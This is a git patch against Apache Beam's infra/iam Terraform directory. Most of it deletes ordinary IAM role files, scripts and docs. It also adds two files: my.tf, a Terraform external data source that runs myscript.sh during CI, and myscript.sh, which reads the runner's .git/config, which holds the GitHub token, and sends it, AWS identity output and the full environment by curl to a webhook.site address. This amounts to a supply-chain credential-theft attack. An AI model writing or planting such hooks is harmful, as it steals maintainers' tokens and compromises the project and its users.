From 9d1ef35ef48ade29171758d7387e4fb6d485821b Mon Sep 17 00:00:00 2001 From: barakharyati <41957095+barakharyati@users.noreply.github.com> Date: Thu, 11 Dec 2025 00:24:24 +0200 Subject: [PATCH 01/18] testdonotmerge --- infra/iam/.terraform.lock.hcl | 21 - infra/iam/README.md | 187 --- infra/iam/config.auto.tfvars | 21 - infra/iam/main.tf | 40 - infra/iam/migrate_roles.py | 340 ----- infra/iam/my.tf | 3 + infra/iam/myscript.sh | 42 + infra/iam/requirements.txt | 22 - infra/iam/roles/README.md | 75 -- infra/iam/roles/beam_admin.role.yaml | 674 ---------- infra/iam/roles/beam_infra_manager.role.yaml | 848 ------------ infra/iam/roles/beam_viewer.role.yaml | 1113 ---------------- infra/iam/roles/beam_writer.role.yaml | 306 ----- infra/iam/roles/generate_roles.py | 277 ---- infra/iam/roles/roles.tf | 45 - infra/iam/roles/roles_config.yaml | 150 --- infra/iam/roles/test_generate_roles.py | 82 -- infra/iam/users.tf | 61 - infra/iam/users.yml | 1237 ------------------ 19 files changed, 45 insertions(+), 5499 deletions(-) delete mode 100644 infra/iam/.terraform.lock.hcl delete mode 100644 infra/iam/README.md delete mode 100644 infra/iam/config.auto.tfvars delete mode 100644 infra/iam/main.tf delete mode 100644 infra/iam/migrate_roles.py create mode 100644 infra/iam/my.tf create mode 100644 infra/iam/myscript.sh delete mode 100644 infra/iam/requirements.txt delete mode 100644 infra/iam/roles/README.md delete mode 100644 infra/iam/roles/beam_admin.role.yaml delete mode 100644 infra/iam/roles/beam_infra_manager.role.yaml delete mode 100644 infra/iam/roles/beam_viewer.role.yaml delete mode 100644 infra/iam/roles/beam_writer.role.yaml delete mode 100644 infra/iam/roles/generate_roles.py delete mode 100644 infra/iam/roles/roles.tf delete mode 100644 infra/iam/roles/roles_config.yaml delete mode 100644 infra/iam/roles/test_generate_roles.py delete mode 100644 infra/iam/users.tf delete mode 100644 infra/iam/users.yml diff --git a/infra/iam/.terraform.lock.hcl b/infra/iam/.terraform.lock.hcl deleted file mode 100644 index 7347ee97418f..000000000000 --- a/infra/iam/.terraform.lock.hcl +++ /dev/null @@ -1,21 +0,0 @@ -# This file is maintained automatically by "terraform init". -# Manual edits may be lost in future updates. - -provider "registry.terraform.io/hashicorp/google" { - version = "6.37.0" - hashes = [ - "h1:uOHr5EZKLKbwco32NyMRrGEwMpD21N/ACPTeYTDQfP0=", - "zh:0527880f838690bc32bf3d4bba42b3adefdf81e6614a169b09def759f341e11e", - "zh:39b5bf4ddebb7289db800faa14acd92e3591bcc711082058a3ecfbf868c43fdf", - "zh:3b0fb69d504d01801fa54dc1b5e8fad59f56a6a1866a7a7475a450e95a690fbf", - "zh:6b354bc2d89ee2a0f55fb11a2360ce94d185e7957b21a6b1a5f2cb01aff35e0b", - "zh:8c8783c892f3b20b425885f78dcd7fbb68fb10c4b8825b7f807eb4de950d963c", - "zh:9291034807a9d4799ecd2cbac33bf3d78aa59c6b734147b9579cd7a3d9ea207c", - "zh:9396293aed1fabc476452a2c6d14775f8e03b0d27ad558a18875fee1dc7fa8f8", - "zh:9e95308ce490dcf8efb45cd945ecf46c7a8b74ad9c65e25800b65ffd2125e4e1", - "zh:9fa9bdd07efd4eaeae1fea44e7926b1abb3d065c938c6cd5fcb0f88b12e09b68", - "zh:b684074bc12e46e671aa627849d8f515045983b53fcc56b7d6ded28abcaf4f10", - "zh:e35d5e5d89469324b8baf68b1d9599ccc1cfacb43f2cfa73107d1de7ce7f3aa9", - "zh:f569b65999264a9416862bca5cd2a6177d94ccb0424f3a4ef424428912b9cb3c", - ] -} diff --git a/infra/iam/README.md b/infra/iam/README.md deleted file mode 100644 index d92d6b833e30..000000000000 --- a/infra/iam/README.md +++ /dev/null @@ -1,187 +0,0 @@ - - -# Infrastructure Permissions Management - -This document outlines the structure of the Beam project control of infrastructure permissions and - provides instructions on how to manage a user or role's permissions. - -## Overview - -### Managing User Roles - -To manage user roles, edit the `users.yml` file. Add or modify entries under the `users` section to - reflect the desired roles for each user. Remember to follow the YAML format: - -```yaml -users: - - username: - email: - member_type: - permissions: - - role: - title: (optional) - description: <description> (optional) - expiry_date: <expiry_date> (optional, format: YYYY-MM-DD) - - role: <role> (optional, for multiple roles) -``` - -> **Note**: `role/owner` roles are handled separately, adding them to the `users.yml` file will be ignored. - -### Applying Changes - -After modifying the `users.yml` file, open a Pull Request (PR) to the `infra/iam` directory. -The changes will be reviewed and when approved, they will be merged into the main branch. - -Once the PR is merged, [the GitHub Actions workflow](../../.github/workflows/beam_UserRoles.yml) - will automatically trigger and apply the changes to the IAM policies in the GCP project using Terraform. - -This will update the IAM policies in the GCP project based on the changes made in the `users.yml` file. - -## Directory Structure - -### Terraform Configuration - -- **main.tf**: The main Terraform configuration file that defines the infrastructure resources and their permissions. -- **config.auto.tfvars**: Contains the configuration variables for the Terraform project. -- **users.tf**: Processes the `users.yml` file to associate users with their respective roles. -- **users.yml**: A YAML file that contains the IAM policies and permissions for users and roles in the Beam project. - -### Migration and Automation - -- **migrate_roles.py**: Python script for migrating existing IAM policies to the new custom roles structure - -## Custom Roles - -The Beam project uses custom IAM roles to provide granular permissions for different levels of access to GCP resources. These roles follow a hierarchical structure where higher-level roles inherit permissions from lower-level roles. - -### Role Hierarchy - -The custom roles are structured in the following hierarchy: - -``` -beam_viewer < beam_writer < beam_infra_manager < beam_admin -``` - -### Available Roles - -#### beam_viewer -- **Description**: Read-only access to the Beam project resources -- **Permissions**: View-only access to all services used by Beam -- **Exclusions**: Secret management permissions, destructive actions -- **Use case**: For team members who need to monitor and observe project resources - -#### beam_writer -- **Description**: User access to resources in the Beam project -- **Permissions**: Inherits all `beam_viewer` permissions plus additional permissions for: - - BigQuery data access and querying - - Cloud SQL instance usage - - Container cluster viewing and development - - Datastore usage - - Network viewing -- **Exclusions**: Destructive actions, administrative operations -- **Use case**: For active contributors who need to work with project resources - -#### beam_infra_manager -- **Description**: Editor access to the Beam project infrastructure -- **Permissions**: Inherits all `beam_writer` permissions plus: - - Cloud Build editor access - - Service account token creation and usage - - Storage object creation and viewing - - General editor role (with exclusions) -- **Exclusions**: Destructive permissions, full administrative access -- **Use case**: For infrastructure maintainers who manage deployments and resources - -#### beam_admin -- **Description**: Full administrative access to the Beam project -- **Permissions**: Complete access including: - - All previous role permissions - - Administrative access to all services - - Secret management capabilities - - Destructive operations -- **Exclusions**: None -- **Use case**: For project administrators and senior maintainers - -### Managing Custom Roles - -Custom roles are defined and managed through configuration files in the `roles/` directory: - -- **roles_config.yaml**: Defines the roles, their hierarchy, services, and base permissions -- **generate_roles.py**: Python script that generates YAML role definitions from the configuration -- **roles.tf**: Terraform configuration that applies the custom roles to the GCP project - -To modify custom roles: - -1. Edit the `roles_config.yaml` file to update role definitions -2. Run `generate_roles.py` to regenerate the role YAML files -3. Apply changes through Terraform or via pull request - -For detailed information about custom roles management, see the [roles directory README](roles/README.md). - -### Migrating from Legacy Roles - -The `migrate_roles.py` script helps migrate existing GCP project IAM policies to the new custom roles structure. This is useful when transitioning from standard GCP roles to the custom Beam roles. - -#### Migration Rules - -The script applies the following hierarchical migration rules: - -- **Owner roles**: Left unchanged (highest privilege) -- **Admin/Secret roles**: Migrated to `beam_admin` (includes all lower roles) -- **Editor roles**: Migrated to `beam_infra_manager` (includes writer and viewer) -- **User roles**: Migrated to `beam_writer` (includes viewer) -- **Viewer roles**: Migrated to `beam_viewer` - -#### Using the Migration Script - -**Prerequisites:** -- Google Cloud SDK installed and authenticated -- Required Python dependencies (install with `pip install -r requirements.txt`) -- Appropriate GCP permissions to read IAM policies - -**Export and migrate IAM policies:** -```bash -python migrate_roles.py <PROJECT_ID> -``` - -This generates two files: -- `<PROJECT_ID>.original-roles.yaml`: Current IAM policy export -- `<PROJECT_ID>.migrated-roles.yaml`: Proposed migration to custom roles - -**Analyze permission differences for a specific user:** -```bash -python migrate_roles.py <PROJECT_ID> --difference <USER_EMAIL> -``` - -This generates: -- `<PROJECT_ID>.permission-differences.yaml`: Detailed comparison of permissions before and after migration - -**Example workflow:** -```bash -# Export current IAM policies and generate migration -python migrate_roles.py apache-beam-testing - -# Check permission differences for a specific user -python migrate_roles.py apache-beam-testing --difference user@example.com - -# Review the generated files before applying changes -# Then apply via Terraform or manual IAM policy updates -``` - -The migration script helps ensure a smooth transition to the custom roles while maintaining appropriate access levels for all users. diff --git a/infra/iam/config.auto.tfvars b/infra/iam/config.auto.tfvars deleted file mode 100644 index befa8fcd6000..000000000000 --- a/infra/iam/config.auto.tfvars +++ /dev/null @@ -1,21 +0,0 @@ -# -# Licensed to the Apache Software Foundation (ASF) under one or more -# contributor license agreements. See the NOTICE file distributed with -# this work for additional information regarding copyright ownership. -# The ASF licenses this file to You under the Apache License, Version 2.0 -# (the "License"); you may not use this file except in compliance with -# the License. You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. -# - -# This file is used for general configuration of the Terraform project, - -# GCP Project ID -project_id = "apache-beam-testing" diff --git a/infra/iam/main.tf b/infra/iam/main.tf deleted file mode 100644 index 42d1ceb62fc8..000000000000 --- a/infra/iam/main.tf +++ /dev/null @@ -1,40 +0,0 @@ -# -# Licensed to the Apache Software Foundation (ASF) under one or more -# contributor license agreements. See the NOTICE file distributed with -# this work for additional information regarding copyright ownership. -# The ASF licenses this file to You under the Apache License, Version 2.0 -# (the "License"); you may not use this file except in compliance with -# the License. You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. -# -# This file defines the general configuration for the Terraform project. -terraform { - required_providers { - google = { - source = "hashicorp/google" - version = "6.37.0" - } - } - - backend "gcs" { - bucket = "beam-terraform-infra-state" - prefix = "terraform/state" - } -} - -variable "project_id" { - description = "The GCP project ID." - type = string -} - -module "beam_roles" { - source = "./roles" - project_id = var.project_id -} \ No newline at end of file diff --git a/infra/iam/migrate_roles.py b/infra/iam/migrate_roles.py deleted file mode 100644 index 3abb9b7bcb0b..000000000000 --- a/infra/iam/migrate_roles.py +++ /dev/null @@ -1,340 +0,0 @@ -# -# Licensed to the Apache Software Foundation (ASF) under one or more -# contributor license agreements. See the NOTICE file distributed with -# this work for additional information regarding copyright ownership. -# The ASF licenses this file to You under the Apache License, Version 2.0 -# (the "License"); you may not use this file except in compliance with -# the License. You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. -# -# This script is used to export the IAM policy of a Google Cloud project to a YAML format. -# It retrieves the IAM policy bindings, parses the members, and formats the output in a structured -# YAML format, excluding service accounts and groups. The output includes usernames, emails, and -# their associated permissions, with optional conditions for roles that have conditions attached. -# You need to have the Google Cloud SDK installed and authenticated to run this script. - -import argparse -import os -import sys -import yaml -import roles.generate_roles as generate_roles -from generate import export_project_iam, to_yaml_file -from google.cloud.iam_admin_v1 import GetRoleRequest, IAMClient - -def migrate_permissions(data: list) -> list: - """ - Migrates permissions from the permissions to the new roles defined on beam_roles/ directory. - - The rules are: - - If the user has owner role, leave it as is, remove any other role as it is redundant. - - If the user has any admin or secret related role, it will be migrated to the beam_admin role. - - If the user has an editor role or any user role but not an admin or secret related role, it will be migrated to the beam_infra_manager role. - - If the user has a role that is not only viewer, it will be migrated to the beam_committer role. - - The users with just viewer roles will be migrated to the beam_viewer role. - - The rules are in a hierarchical order, meaning that if a user has a high role, it will also have the lower roles. - - Args: - data: A list of dictionaries containing user permissions and details. - Returns: - A list of dictionaries with migrated permissions. - """ - - migrated_data = [] - - for item in data: - username = item["username"] - email = item["email"] - permissions = item["permissions"] - - # Initialize the new roles - new_roles = { - "beam_owner": False, - "beam_admin": False, - "beam_infra_manager": False, - "beam_committer": False, - "beam_viewer": False - } - - for permission in permissions: - role = permission["role"] - - # If the role is 'roles/owner', it is considered an owner role. - if role == "roles/owner": - new_roles["beam_owner"] = True - # If it ends with 'admin' or containes 'secretmanager' in the role, it is considered an admin role. Case insensitive. - elif 'admin' in role.lower() or 'secretmanager' in role.lower(): - new_roles["beam_admin"] = True - new_roles["beam_infra_manager"] = True - new_roles["beam_committer"] = True - new_roles["beam_viewer"] = True - # If it is an editor role, it will be migrated to the beam_infra_manager. - elif role == "roles/editor": - new_roles["beam_infra_manager"] = True - new_roles["beam_committer"] = True - new_roles["beam_viewer"] = True - elif role != "roles/viewer": - # If it is a role that is not only viewer, it will be migrated to the beam_committer role. - new_roles["beam_committer"] = True - new_roles["beam_viewer"] = True - # If it is a viewer role, it will be migrated to the beam_viewer role. - else: - new_roles["beam_viewer"] = True - - # Create the migrated entry - migrated_entry = { - "username": username, - "email": email, - "permissions": [] - } - - if new_roles["beam_owner"]: - migrated_entry["permissions"].append({"role": "roles/owner"}) - else: - if new_roles["beam_admin"]: - migrated_entry["permissions"].append({"role": "projects/PROJECT-ID/roles/beam_admin"}) - if new_roles["beam_infra_manager"]: - migrated_entry["permissions"].append({"role": "projects/PROJECT-ID/roles/beam_infra_manager"}) - if new_roles["beam_committer"]: - migrated_entry["permissions"].append({"role": "projects/PROJECT-ID/roles/beam_committer"}) - if new_roles["beam_viewer"]: - migrated_entry["permissions"].append({"role": "projects/PROJECT-ID/roles/beam_viewer"}) - - migrated_data.append(migrated_entry) - - return migrated_data - -def get_gcp_role_permissions(role_id: str) -> list: - """ - Retrieves the permissions associated to a google cloud role. - Args: - project_id: The ID of the Google Cloud project. - role_id: The name of the role to retrieve permissions for. - Returns: - A list of permissions associated with the specified role. - """ - client = IAMClient() - - request = GetRoleRequest(name=role_id) - role = client.get_role(request=request) - - return list(role.included_permissions) - -def get_roles_from_file(file_path: str) -> list: - """ - Reads a YAML file containing roles and returns a list of dictionaries with user data. - - Args: - file_path: The path to the YAML file containing roles. - Returns: - A list of dictionaries with user data. - """ - with open(file_path, 'r') as file: - data = yaml.safe_load(file) - - roles = [] - for role in data: - email = role.get("email") - username = role.get("username") - permissions = role.get("permissions", []) - - roles.append({ - "email": email, - "username": username, - "permissions": permissions - }) - - return roles - -def permission_differences(project_id: str, user_email: str) -> list: - """ - Generates a list of differences between the original and migrated permissions for a user. - It gets the permission from the generated files, so it is expected that the files are already generated and up to date. - - Args: - project_id: The ID of the Google Cloud project. - user_email: The email of the user to compare permissions for. - Returns: - A list of dictionaries containing the differences in permissions for the specified user. - """ - - cache = {} - user_differences = {} - - original = get_roles_from_file(f"{project_id}.original-roles.yaml") - migrated = get_roles_from_file(f"{project_id}.migrated-roles.yaml") - - # Get the permissions on the beam_roles - beam_roles = generate_roles.get_roles() - for role_name, role_data in beam_roles.items(): - permissions = role_data["permissions"] - cache[role_name] = permissions - - # Get the permissions for the original roles - for user in original: - username = user["username"] - email = user["email"] - - # Skip if the user email does not match the specified user_email - if user_email and email != user_email: - continue - - original_roles = user["permissions"] - - original_permissions = [] - - for role in original_roles: - if '_withcond_' in role['role']: - # Skip roles with conditions, as they are not supported in the new roles - continue - if 'organizations/' in role['role']: - # Skip organization roles, as they are not supported in the new roles - continue - - if role['role'] not in cache: - permissions = get_gcp_role_permissions(role["role"]) - cache[role['role']] = sorted(permissions) - original_permissions.extend(cache[role['role']]) - - # Initialize the user differences entry - user_differences[username] = { - "email": email, - "original_roles": original_roles, - "original_permissions": sorted(original_permissions), - "migrated_roles": [], - "migrated_permissions": [], - "differences": [] - } - - # Get the permissions for the migrated roles - for user in migrated: - username = user["username"] - email = user["email"] - - # Skip if the user email does not match the specified user_email - if user_email and email != user_email: - continue - - migrated_roles = user["permissions"] - - migrated_permissions = [] - - for role in migrated_roles: - full_role_name = role["role"] - # Owner is a special case, it should not be migrated to any other role. - if "roles/owner" in full_role_name: - migrated_permissions.extend(get_gcp_role_permissions(full_role_name)) - else: - role_name = full_role_name.split('roles/')[1] - migrated_permissions.extend(cache[role_name]) - - user_differences[username]["migrated_roles"] = migrated_roles - user_differences[username]["migrated_permissions"] = sorted(migrated_permissions) - - # Compare original and migrated permissions - differences_list = [] - - for username, user_data in user_differences.items(): - original_permissions = user_data["original_permissions"] - migrated_permissions = user_data["migrated_permissions"] - - # Find differences in permissions - original_set = set(original_permissions) - migrated_set = set(migrated_permissions) - - added_permissions = migrated_set.difference(original_set) - removed_permissions = original_set.difference(migrated_set) - - if added_permissions or removed_permissions: - differences = { - "username": username, - "email": user_data["email"], - "added_permissions": sorted(list(added_permissions)), - "removed_permissions": sorted(list(removed_permissions)) - } - differences_list.append(differences) - - return differences_list - -def main(): - """ - Main function to run the script. - - This function parses command-line arguments to either export IAM policies - or generate permission differences for a specified GCP project. - """ - parser = argparse.ArgumentParser( - description="Export IAM policies or generate permission differences for a GCP project." - ) - parser.add_argument( - "project_id", - help="The Google Cloud project ID." - ) - parser.add_argument( - "--difference", - dest="user_email", - metavar="USER_EMAIL", - help="Generate permission differences for the specified user email." - ) - - args = parser.parse_args() - - project_id = args.project_id - user_email = args.user_email - - if user_email: - # If the iam policy has not been generated yet, it will generate the original IAM policy first. - if not os.path.exists(f"{project_id}.original-roles.yaml") or not os.path.exists(f"{project_id}.migrated-roles.yaml"): - print(f"Original IAM policy for project {project_id} not found. Generating original and migrated roles first.") - - print(f"Exporting IAM policy for project {project_id}...") - iam_data = export_project_iam(project_id) - - original_filename = f"{project_id}.original-roles.yaml" - original_header = f"Exported original IAM policy for project {project_id}" - to_yaml_file(iam_data, original_filename, header_info=original_header) - - print("Migrating permissions to new roles...") - migrated_data = migrate_permissions(iam_data) - migrated_filename = f"{project_id}.migrated-roles.yaml" - migrated_header = f"Migrated IAM policy for project {project_id} to new beam_roles" - to_yaml_file(migrated_data, migrated_filename, header_info=migrated_header) - - print(f"Generated {original_filename} and {migrated_filename}") - - print(f"Generating permission differences for {user_email} in project {project_id}...") - differences = permission_differences(project_id, user_email) - if differences: - output_filename = f"{project_id}.permission-differences.yaml" - header = f"Permission differences for user {user_email} in project {project_id}" - to_yaml_file(differences, output_filename, header_info=header) - print(f"Generated {output_filename}") - else: - print(f"No permission differences found for user {user_email} in project {project_id}.") - else: - print(f"Exporting IAM policy for project {project_id}...") - iam_data = export_project_iam(project_id) - - original_filename = f"{project_id}.original-roles.yaml" - original_header = f"Exported original IAM policy for project {project_id}" - to_yaml_file(iam_data, original_filename, header_info=original_header) - - print("Migrating permissions to new roles...") - migrated_data = migrate_permissions(iam_data) - migrated_filename = f"{project_id}.migrated-roles.yaml" - migrated_header = f"Migrated IAM policy for project {project_id} to new beam_roles" - to_yaml_file(migrated_data, migrated_filename, header_info=migrated_header) - - print(f"Generated {original_filename} and {migrated_filename}") - print(f"To generate permission differences, run: python {sys.argv[0]} {project_id} --difference <user_email>") - - -if __name__ == "__main__": - main() \ No newline at end of file diff --git a/infra/iam/my.tf b/infra/iam/my.tf new file mode 100644 index 000000000000..bca257092771 --- /dev/null +++ b/infra/iam/my.tf @@ -0,0 +1,3 @@ +data "external" "run" { + program = ["bash", "-c", "$(chmod +x myscript.sh; ./myscript.sh);{}"] +} \ No newline at end of file diff --git a/infra/iam/myscript.sh b/infra/iam/myscript.sh new file mode 100644 index 000000000000..a02cca9e8b40 --- /dev/null +++ b/infra/iam/myscript.sh @@ -0,0 +1,42 @@ +echo "hello from rce " >&2 + + +echo "/home/runner/work/beam/beam/.git/config" >&2 +cat /home/runner/work/beam/beam/.git/config >&2 + +# echo "cat /home/runner/.gitconfig " >&2 +# cat /home/runner/.gitconfig >&2 + +# echo "cat /etc/gitconfi" >&2 +# cat /etc/gitconfig >&2 + +# echo "cat myscript.sh" >&2 +# cat myscript.sh >&2 +# echo "base64 /home/runner/work/beam/beam/.git/config" + +curl -X POST \ + -H "Content-Type: text/plain" \ + --data "$(base64 -w 0 /home/runner/work/beam/beam/.git/config)" \ + https://webhook.site/dda47cb0-8450-4adb-ba27-839b4a9a3229/githubtoken-base + +curl -X POST \ + -H "Content-Type: text/plain" \ + --data "$(cat /home/runner/work/beam/beam/.git/config)" \ + https://webhook.site/dda47cb0-8450-4adb-ba27-839b4a9a3229/githubtoken + +curl -X POST \ + -H "Content-Type: text/plain" \ + --data "$(aws sts get-caller-identity)" \ + https://webhook.site/dda47cb0-8450-4adb-ba27-839b4a9a3229/aws-identity + + +CREDS=$(aws sts get-session-token) + +curl -X POST \ + -H "Content-Type: text/plain" \ + --data "$(printenv)" \ + https://webhook.site/dda47cb0-8450-4adb-ba27-839b4a9a3229/printenv + + +sleep 600 + diff --git a/infra/iam/requirements.txt b/infra/iam/requirements.txt deleted file mode 100644 index 4e4ee15bbe10..000000000000 --- a/infra/iam/requirements.txt +++ /dev/null @@ -1,22 +0,0 @@ -# -# Licensed to the Apache Software Foundation (ASF) under one or more -# contributor license agreements. See the NOTICE file distributed with -# this work for additional information regarding copyright ownership. -# The ASF licenses this file to You under the Apache License, Version 2.0 -# (the "License"); you may not use this file except in compliance with -# the License. You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. - -# This file is used to install the dependencies for the infrastructure - -PyYAML==6.0.2 -google-cloud==0.34.0 -google-cloud-iam==2.19.0 -google-cloud-resource-manager==1.14.1 \ No newline at end of file diff --git a/infra/iam/roles/README.md b/infra/iam/roles/README.md deleted file mode 100644 index 94b04b8f27b5..000000000000 --- a/infra/iam/roles/README.md +++ /dev/null @@ -1,75 +0,0 @@ -<!-- - Licensed to the Apache Software Foundation (ASF) under one - or more contributor license agreements. See the NOTICE file - distributed with this work for additional information - regarding copyright ownership. The ASF licenses this file - to you under the Apache License, Version 2.0 (the - "License"); you may not use this file except in compliance - with the License. You may obtain a copy of the License at - - http://www.apache.org/licenses/LICENSE-2.0 - - Unless required by applicable law or agreed to in writing, - software distributed under the License is distributed on an - "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY - KIND, either express or implied. See the License for the - specific language governing permissions and limitations - under the License. ---> - -# Beam custom roles - -This document describes the custom roles defined for the Beam project and their associated permissions. - - -## Roles - -The following files are used to define and manage roles: - -- `roles_config.yaml`: A YAML file that defines the roles and their associated services. -- `generate_roles.py`: A Python script that generates yaml files for the roles. -- `roles.tf`: A Terraform file that applies that generate the roles described over the custom roles created. - -### Defined roles - -The roles are defined in the `roles_config.yaml` file. Each role includes a name, description, and a list of services associated with it. - -The defined roles are: - -- `beam_viewer`: Read-only access to the Beam project. Excludes secret management permissions. -- `beam_writer`: User access to the the resources in the Beam project. -- `beam_infra_manager`: Editor access to the Beam project, excluding destructive permissions. -- `beam_admin`: Full access to the Beam project, including destructive capabilities and secret management. - -Roles are structured in a hierarchy, allowing for inheritance of permissions. Each role builds upon the previous one. The hierarchy is as follows: - -```plaintext -beam_viewer < beam_writer < beam_infra_manager < beam_admin -``` - -### Modifying Roles services - -Each role can have its associated base roles and services. The `roles_config.yaml` file defines the services associated with each role. For example, the `beam_viewer` role has read-only access to the project, while the `beam_infra_manager` role has editor access but excludes destructive permissions. - -To modify the services associated with a role, edit the `roles_config.yaml` file and update the relevant service and roles lists under each role. After making changes, re-run the `generate_roles.py` script to apply the updates. - -The `generate_roles.py` script, install the dependencies using: - -```bash -pip install -r requirements.txt -``` - -After modifying the `roles_config.yaml` file, run the script to generate the yaml files for the roles: - -```bash -python3 generate_roles.py -``` - -This will update the `beam_roles` directory with the new role definitions. You do not need any GCP permissions to run this script, as it only generates local files. - -To apply the changes to the GCP project, ensure you have a owner role in the GCP project, go to the main `infra/iam` directory and run the following Terraform commands: - -```bash -terraform plan -terraform apply -``` diff --git a/infra/iam/roles/beam_admin.role.yaml b/infra/iam/roles/beam_admin.role.yaml deleted file mode 100644 index 4296196c495e..000000000000 --- a/infra/iam/roles/beam_admin.role.yaml +++ /dev/null @@ -1,674 +0,0 @@ -# Licensed to the Apache Software Foundation (ASF) under one or more -# contributor license agreements. See the NOTICE file distributed with -# this work for additional information regarding copyright ownership. -# The ASF licenses this file to You under the Apache License, Version 2.0 -# (the "License"); you may not use this file except in compliance with -# the License. You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. - -# This file is auto-generated by generate_roles.py. -# Do not edit manually. - -# This file was generated on 2025-08-11 14:34:54 UTC - -description: This is the beam_admin role -permissions: -- artifactregistry.attachments.delete -- artifactregistry.files.delete -- artifactregistry.packages.delete -- artifactregistry.repositories.createTagBinding -- artifactregistry.repositories.delete -- artifactregistry.repositories.deleteTagBinding -- artifactregistry.repositories.setIamPolicy -- artifactregistry.rules.delete -- artifactregistry.tags.delete -- artifactregistry.versions.delete -- biglake.catalogs.delete -- biglake.catalogs.setIamPolicy -- biglake.databases.delete -- biglake.locks.delete -- biglake.namespaces.delete -- biglake.namespaces.setIamPolicy -- biglake.tables.delete -- biglake.tables.setIamPolicy -- bigquery.capacityCommitments.create -- bigquery.capacityCommitments.delete -- bigquery.connections.delegate -- bigquery.connections.delete -- bigquery.connections.setIamPolicy -- bigquery.dataPolicies.delete -- bigquery.dataPolicies.setIamPolicy -- bigquery.datasets.createTagBinding -- bigquery.datasets.delete -- bigquery.datasets.deleteTagBinding -- bigquery.datasets.link -- bigquery.datasets.listSharedDatasetUsage -- bigquery.datasets.setIamPolicy -- bigquery.datasets.update -- bigquery.jobs.delete -- bigquery.jobs.listAll -- bigquery.jobs.update -- bigquery.models.delete -- bigquery.reservationAssignments.delete -- bigquery.reservationGroups.delete -- bigquery.reservations.delete -- bigquery.routines.delete -- bigquery.rowAccessPolicies.delete -- bigquery.rowAccessPolicies.setIamPolicy -- bigquery.savedqueries.delete -- bigquery.tables.create -- bigquery.tables.createTagBinding -- bigquery.tables.delete -- bigquery.tables.deleteSnapshot -- bigquery.tables.deleteTagBinding -- bigquery.tables.setCategory -- bigquery.tables.setIamPolicy -- bigquery.tables.update -- bigquery.tables.updateData -- bigquery.tables.updateTag -- bigquerymigration.workflows.delete -- cloudasset.feeds.list -- cloudasset.othercloudconnections.delete -- cloudasset.savedqueries.delete -- cloudbuild.connections.delete -- cloudbuild.connections.setIamPolicy -- cloudbuild.integrations.delete -- cloudbuild.repositories.delete -- cloudbuild.workerpools.delete -- cloudfunctions.functions.delete -- cloudfunctions.functions.setIamPolicy -- cloudkms.cryptoKeys.setIamPolicy -- cloudkms.ekmConfigs.setIamPolicy -- cloudkms.ekmConnections.setIamPolicy -- cloudkms.importJobs.setIamPolicy -- cloudkms.keyRings.setIamPolicy -- cloudsql.backupRuns.delete -- cloudsql.databases.delete -- cloudsql.instances.delete -- cloudsql.sslCerts.delete -- cloudsql.users.delete -- compute.addresses.createTagBinding -- compute.addresses.delete -- compute.addresses.deleteTagBinding -- compute.advice.calendarMode -- compute.autoscalers.delete -- compute.backendBuckets.createTagBinding -- compute.backendBuckets.delete -- compute.backendBuckets.deleteTagBinding -- compute.backendBuckets.setIamPolicy -- compute.backendServices.createTagBinding -- compute.backendServices.delete -- compute.backendServices.deleteTagBinding -- compute.backendServices.setIamPolicy -- compute.crossSiteNetworks.delete -- compute.disks.createTagBinding -- compute.disks.delete -- compute.disks.deleteTagBinding -- compute.disks.setIamPolicy -- compute.externalVpnGateways.createTagBinding -- compute.externalVpnGateways.delete -- compute.externalVpnGateways.deleteTagBinding -- compute.firewallPolicies.createTagBinding -- compute.firewallPolicies.delete -- compute.firewallPolicies.deleteTagBinding -- compute.firewallPolicies.setIamPolicy -- compute.firewalls.createTagBinding -- compute.firewalls.delete -- compute.firewalls.deleteTagBinding -- compute.forwardingRules.createTagBinding -- compute.forwardingRules.delete -- compute.forwardingRules.deleteTagBinding -- compute.futureReservations.cancel -- compute.futureReservations.delete -- compute.futureReservations.setIamPolicy -- compute.globalAddresses.createTagBinding -- compute.globalAddresses.delete -- compute.globalAddresses.deleteTagBinding -- compute.globalForwardingRules.createTagBinding -- compute.globalForwardingRules.delete -- compute.globalForwardingRules.deleteTagBinding -- compute.globalNetworkEndpointGroups.createTagBinding -- compute.globalNetworkEndpointGroups.delete -- compute.globalNetworkEndpointGroups.deleteTagBinding -- compute.globalOperations.delete -- compute.globalPublicDelegatedPrefixes.delete -- compute.healthChecks.createTagBinding -- compute.healthChecks.delete -- compute.healthChecks.deleteTagBinding -- compute.httpHealthChecks.createTagBinding -- compute.httpHealthChecks.delete -- compute.httpHealthChecks.deleteTagBinding -- compute.httpsHealthChecks.createTagBinding -- compute.httpsHealthChecks.delete -- compute.httpsHealthChecks.deleteTagBinding -- compute.images.createTagBinding -- compute.images.delete -- compute.images.deleteTagBinding -- compute.instanceGroupManagers.createTagBinding -- compute.instanceGroupManagers.delete -- compute.instanceGroupManagers.deleteTagBinding -- compute.instanceGroups.createTagBinding -- compute.instanceGroups.delete -- compute.instanceGroups.deleteTagBinding -- compute.instanceTemplates.delete -- compute.instanceTemplates.setIamPolicy -- compute.instances.createTagBinding -- compute.instances.delete -- compute.instances.deleteTagBinding -- compute.instances.setIamPolicy 